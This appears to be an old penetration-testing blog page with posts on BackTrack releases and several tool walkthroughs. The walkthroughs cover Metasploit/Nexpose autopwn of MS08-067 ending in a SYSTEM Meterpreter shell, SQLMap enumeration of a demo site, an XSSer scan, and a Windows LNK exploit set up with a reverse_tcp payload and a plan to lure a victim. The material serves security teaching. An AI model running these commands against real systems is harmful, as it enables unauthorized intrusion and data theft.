Penetration testing

 

BackTrack 5 R1 released

0

 

 

 

 

BackTrack guys have Released a Updated Version of BackTrack 5 with Lot of new Tools and Updates.for more Information check out the Below Link.

http://www.backtrack-linux.org/backtrack/backtrack-5-r1-released/

http://www.backtrack-linux.org/downloads/

 

Metasploit: A Penetration Tester’s Guide Book Comming Soon

2

 

Metasploit: A Penetration Tester’s Guide will teach you how to:

  • Find and exploit unmaintained, misconfigured, and unpatched systems
  • Perform reconnaissance and find valuable information about your target
  • Bypass anti-virus technologies and circumvent security controls
  • Integrate Nmap, NeXpose, and Nessus with Metasploit to automate discovery
  • Use the Meterpreter shell to launch further attacks from inside the network
  • Harness standalone Metasploit utilities, third-party tools, and plug-ins
  • Learn how to write your own Meterpreter post exploitation modules and scripts

http://www.amazon.com/Metasploit-Penetration-Testers-David-Kennedy/dp/159327288X

Add Video

 

BackTrack 5 Released

0

 

Finally

The BackTrack Dev team has worked furiously in the past months on BackTrack 5, code name “revolution”. Today, we are proud to release our work to the public, and then rest for a couple of weeks.

This new revision has been built from scratch, and boasts several major improvements over all our previous releases.

http://www.backtrack-linux.org/backt…rack-5-release

http://www.backtrack-linux.org/downloads/

Direct Downloads

http://mirrors.rit.edu/backtrack/

 

 

Nexpose + Metasploit = Shell

5

In last post i had told u how to install Nexpose on Backtrack4RC2,today we will see how to use Nexpose through msf

Metasploit has Nexpose plugin were we can login to Nexpose scan the Target System and import the Scan Results to Metasploit,,then msf will check for the exploits Matching those vulnerabilities and it automatically run those exploits if the target system is vulnerable then get us a Interactive Shell,Lets begin

1)Run the Nexpose scanner

2)start the metasploit

root@bt:/pentest/exploits/framework3# ./msfconsole

msf > db_driver sqlite3

msf > db_create

msf > load nexpose

msf > nexpose_connect punter:[email protected]

msf > nexpose_scan -x 192.168.0.102

msf > sessions -i 1


check out the below Interactive text Snapshot

root@bt:/pentest/exploits/framework3# ./msfconsole

o                       8         o   o
8                       8             8
ooYoYo. .oPYo.  o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8  o8P
8′ 8  8 8oooo8   8  .oooo8 Yb..   8    8 8 8    8  8   8
8  8  8 8.       8  8    8   ‘Yb. 8    8 8 8    8  8   8
8  8  8 `Yooo’   8  `YooP8 `YooP’ 8YooP’ 8 `YooP’  8   8
..:..:..:…..:::..::…..::…..:8…..:..:…..::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

=[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ — –=[ 636 exploits – 319 auxiliary
+ — –=[ 215 payloads – 27 encoders – 8 nops
=[ svn r11120 updated 17 days ago (2010.11.24)

Warning: This copy of the Metasploit Framework was last updated 17 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:

http://www.metasploit.com/redmine/projects/framework/wiki/Updating

msf > db_driver sqlite3
[*] Using database driver sqlite3
msf > db_create
[-]
[-] Warning: The db_create command is deprecated, use db_connect instead.
[-]          The database and schema will be created automatically by
[-]          db_connect. If db_connect fails to create the database, create
[-]          it manually with your DBMS’s administration tools.
[-]
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: /root/.msf3/sqlite3.db
msf > load nexpose

____             _     _ _____   _   _     __  __
|  _ \ __ _ _ __ (_) __| |___  | | \ | | ___\ \/ /_ __   ___  ___  ___
| |_) / _` | ‘_ \| |/ _` |  / /  |  \| |/ _ \\  /| ‘_ \ / _ \/ __|/ _ \
|  _ < (_| | |_) | | (_| | / /   | |\  |  __//  \| |_) | (_) \__ \  __/
|_| \_\__,_| .__/|_|\__,_|/_/    |_| \_|\___/_/\_\ .__/ \___/|___/\___|
|_|                                   |_|

[*] NeXpose integration has been activated
[*] Successfully loaded plugin: nexpose
msf > nexpose_connect punter:[email protected]
[*] Connecting to NeXpose instance at 127.0.0.1:3780 with username punter…
msf > nexpose_scan -x 192.168.0.102
[*] Scanning 1 addresses with template pentest-audit in sets of 32
[*] Completed the scan of 1 addresses
[*] Launching an automated exploitation session
[*] Analysis completed in 26 seconds (0 vulns / 0 refs)
[*]
[*] ================================================================================
[*]                             Matching Exploit Modules
[*] ================================================================================
[*]   192.168.0.102:445  exploit/windows/smb/ms08_067_netapi  (NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos, CVE-2008-4250, CVE-2008-4250, OSVDB-49243, MSB-MS08-067, NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos)
[*]   192.168.0.102:445  exploit/windows/smb/ms06_040_netapi  (CVE-2006-3439)
[*] ================================================================================
[*]
[*]
[*] (1/2 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.0.102:445…
[*] (2/2 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.0.102:445…
[*] (2/2 [0 sessions]): Waiting on 2 launched modules to finish execution…
[*] (2/2 [0 sessions]): Waiting on 2 launched modules to finish execution…
[*] (2/2 [0 sessions]): Waiting on 1 launched modules to finish execution…
[*] Meterpreter session 1 opened (192.168.0.104:18282 -> 192.168.0.102:1067) at Sat Dec 11 03:40:01 -0500 2010
[*] (2/2 [1 sessions]): Waiting on 1 launched modules to finish execution…
[*] (2/2 [1 sessions]): Waiting on 0 launched modules to finish execution…
[*] The autopwn command has completed with 1 sessions
[*] Enter sessions -i [ID] to interact with a given session ID
[*]
[*] ================================================================================

Active sessions
===============

Id  Type                   Information                            Connection                                 Via
—  —-                   ———–                            ———-                                 —
1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ TESTBOX-85474D5  192.168.0.104:18282 -> 192.168.0.102:1067  exploit/windows/smb/ms08_067_netapi

[*] ================================================================================

msf > sessions -i 1
[*] Starting interaction with 1…

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 1040 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 192.168.0.102
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.0.1

C:\WINDOWS\system32>exit

Using SQLMap for sql Injection

0

We have been using lot of tools for sqlinjection while Pentesting today we will see how to use SQLMap a Open source Database Fingerprinting tool which works without much of the false positives,we will test this tool on http://testphp.vulnweb.com demo site.

  1. Database Fingerprinting

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1

sqlmap/0.9-dev – automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net[*] starting at: 11:52:47

[11:52:47] [INFO] using ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session’ as session file
[11:52:47] [INFO] resuming injection point ‘GET’ from session file
[11:52:47] [INFO] resuming injection parameter ‘cat’ from session file
[11:52:47] [INFO] resuming injection type ‘numeric’ from session file
[11:52:47] [INFO] resuming match ratio ‘0.701’ from session file
[11:52:47] [INFO] resuming 0 number of parenthesis from session file
[11:52:47] [INFO] resuming back-end DBMS ‘mysql 5′ from session file
[11:52:47] [INFO] testing connection to the target url
[11:52:48] [INFO] testing for parenthesis on injectable parameter
[11:52:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5[*] shutting down at: 11:52:48

2)Finding the Database name and current user.


./sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 –current-db –current-user

sqlmap/0.9-dev – automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net[*] starting at: 11:57:13

[11:57:13] [INFO] using ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session’ as session file
[11:57:13] [INFO] resuming injection point ‘GET’ from session file
[11:57:13] [INFO] resuming injection parameter ‘cat’ from session file
[11:57:13] [INFO] resuming injection type ‘numeric’ from session file
[11:57:13] [INFO] resuming match ratio ‘0.701’ from session file
[11:57:13] [INFO] resuming 0 number of parenthesis from session file
[11:57:13] [INFO] resuming back-end DBMS ‘mysql 5′ from session file
[11:57:13] [INFO] testing connection to the target url
[11:57:17] [INFO] testing for parenthesis on injectable parameter
[11:57:17] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5
[11:57:17] [INFO] fetching current user
[11:57:17] [INFO] retrieved: acuart@localhost
current user:    ‘acuart@localhost’

[11:58:45] [INFO] fetching current database
[11:58:45] [INFO] read from file ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session': acuart
current database:    ‘acuart’

[11:58:45] [INFO] Fetched data logged to text files under ‘/pentest/database/sqlmap/output/testphp.vulnweb.com’[*] shutting down at: 11:58:45

3) Enumerate Databases

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 –dbs

sqlmap/0.9-dev – automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net[*] starting at: 12:00:57

[12:00:58] [INFO] using ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session’ as session file
[12:00:58] [INFO] resuming injection point ‘GET’ from session file
[12:00:58] [INFO] resuming injection parameter ‘cat’ from session file
[12:00:58] [INFO] resuming injection type ‘numeric’ from session file
[12:00:58] [INFO] resuming match ratio ‘0.701’ from session file
[12:00:58] [INFO] resuming 0 number of parenthesis from session file
[12:00:58] [INFO] resuming back-end DBMS ‘mysql 5′ from session file
[12:00:58] [INFO] testing connection to the target url
[12:00:58] [INFO] testing for parenthesis on injectable parameter
[12:00:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5
[12:00:58] [INFO] fetching database names
[12:00:58] [INFO] fetching number of databases
[12:00:58] [INFO] read from file ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session': 3
[12:00:58] [INFO] read from file ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session': information_schema
[12:00:58] [INFO] read from file ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session': acuart
[12:00:58] [INFO] read from file ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session': modrewriteShop
available databases [3]:[*] acuart[*] information_schema[*] modrewriteShop

[12:00:58] [INFO] Fetched data logged to text files under ‘/pentest/database/sqlmap/output/testphp.vulnweb.com’[*] shutting down at: 12:00:58
4) Enumerate Database tables and Columns

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 –tables –columns

sqlmap/0.9-dev – automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[*] starting at: 12:03:27

[12:03:27] [INFO] using ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session’ as session file
[12:03:27] [INFO] resuming injection point ‘GET’ from session file
[12:03:27] [INFO] resuming injection parameter ‘cat’ from session file
[12:03:27] [INFO] resuming injection type ‘numeric’ from session file
[12:03:27] [INFO] resuming match ratio ‘0.701’ from session file
[12:03:27] [INFO] resuming 0 number of parenthesis from session file
[12:03:27] [INFO] resuming back-end DBMS ‘mysql 5′ from session file
[12:03:27] [INFO] testing connection to the target url
[12:03:28] [INFO] testing for parenthesis on injectable parameter
[12:03:28] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5
[12:03:28] [INFO] fetching tables
[12:03:28] [INFO] fetching database names
[12:03:28] [INFO] fetching number of databases
[12:03:28] [INFO] read from file ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session': 3
[12:03:28] [INFO] read from file ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session': information_schema
[12:03:28] [INFO] read from file ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session': acuart
[12:03:28] [INFO] read from file ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session': modrewriteShop
[12:03:28] [INFO] fetching number of tables for database ‘information_schema’
[12:03:28] [INFO] retrieved: 16
[12:03:37] [INFO] retrieved: CHARACTER_SETS
[12:04:52] [INFO] retrieved: COLLATI

It was So easy from this tool to enumerate the details next i will be telling on using sqlmap for Advanced techniques

Two methodologies for physical penetration testing using social engineering

1

below are Two methodologies for which describes how to conduct physical penetration testing using-social-engineering.

http://whitepapers.hackerjournals.com/wp-content/uploads/2010/07/Two-methodologies-for-physical-penetration-testing-using-social-engineering.pdf

 

Detecting and exploiting XSS injections using XSSer Tool

3

what is XSSer

XSSer is an open source penetration testing tool that automates the process of detecting and exploiting XSS injections against different applications.

we will test this tool on the http://testasp.vulnweb.com/ vulnerable site.

how to use this too

  1. root@punter:/pentest/web# $ svn co https://xsser.svn.sourceforge.net/svnroot/xsser xsser
  2. root@punter:/pentest/web# cd xsser
  3. root@punter:/pentest/web/xsser# python XSSer.py -u “http://testasp.vulnweb.com” -g “Search.asp?tfSearch=” –proxy “http://127.0.0.1:8118″ –referer “666.666.666.666” –user-agent “correct audit” –Fuzz -s
  4. below are the results

see the above results which is marked with blue and the attack URl we will test the results manually to confirm the XSS vulnerability chk the below screenshot

This Tool Works Perfectly finding XSS using the Automation Process

SAP Penetration Testing Video and Slides by Mariano Nunez Di Croce

5

SAP stands for Systems, Applications and Products in Data Processing, and is the world’s fourth largest software enterprise. SAP is headquartered out of Germany and is best known for its Enterprise Resource Planning (ERP) software which has deployments in over 41,000 companies around the world. Mariano’s presentation is very in-depth and starts with basics of a SAP installation and slowly builds on the various security vulnerabilities which exist and then moves on to how to exploit them while pentesting. He also discusses the open source tool Sapyto, which he maintains and distributes.

Detail Video on Testing SAP Applications

http://www.securitytube.net/SAP-Pene…%29-video.aspx

Slides from Mariano’s Blackhat presentation
http://www.blackhat.com/presentation…ing-slides.pdf

Exploiting Windows LNK vulnerability (CVE-2010-2568)

0

Recently there has been detected a new 0 day exploit which takes advantage of Windows incorrectly parses shortcuts so that malicious code can be executed when the icon of a specially crafted shortcut is displayed. this can be exploited locally through a malicious USB drive, or remotely via network shares and WebDAV.Recently metasploit have pushed the exploit to the msf module.still there is no patch relased for this vulnerability.
there are 2 ways to exploit this

1)keep these 2 files LNK file and the DLL in the USb stick and run on the victim machine
2)or trick the victim in accessing the maclicious site.
we will use 2 nd method .
3)svn update (update ur msf)
3)use windows/browser/ms10_xxx_windows_shell_lnk_execute
4)set payload windows/meterpreter/reverse_tcp
5)set LHOST 192.168.0.103 (your ip)
6)set LPORT 1427 (any port)
7)exploit

chk out my video to accomplish the above method Exploiting Windows LNK vulnerability (CVE-2010-2568)

NeoPwn Nokia N900 Mobile Penetration Testing device

0

Nokia900 has been Just released in our Country and Planning to buy the Awesome device,to install Neopwn Operation system which has Most of the backtrack tools Ported to debian to this device.NeoPwn beta will be released soon this month .

Neopwn project Details

http://www.neopwn.com/

Chkout the Teaser Vidoes

Go to Top